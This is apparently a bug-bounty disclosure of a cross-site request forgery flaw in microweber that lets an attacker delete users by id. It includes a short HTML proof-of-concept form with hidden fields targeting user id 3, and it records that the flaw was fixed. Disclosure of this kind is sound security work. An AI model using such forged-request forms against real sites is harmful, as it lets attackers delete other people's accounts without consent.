Cross-Site Request Forgery (CSRF) in microweber/microweber


Reported on

Sep 9th 2021

✍️ Description

Attacker able to delete any user if knows the user id parameter value.

🕵️‍♂️ Proof of Concept

Here after running PoC.html and you will see that the user with id 3 has been deleted.


  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="hidden" name="id" value="3" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />

💥 Impact

Here a user with id value 3 will be deleted with CSRF attack.

We have contacted a member of the microweber team and are waiting to hear back 2 years ago
Peter Ivanov marked this as fixed with commit 5383c2 2 years ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation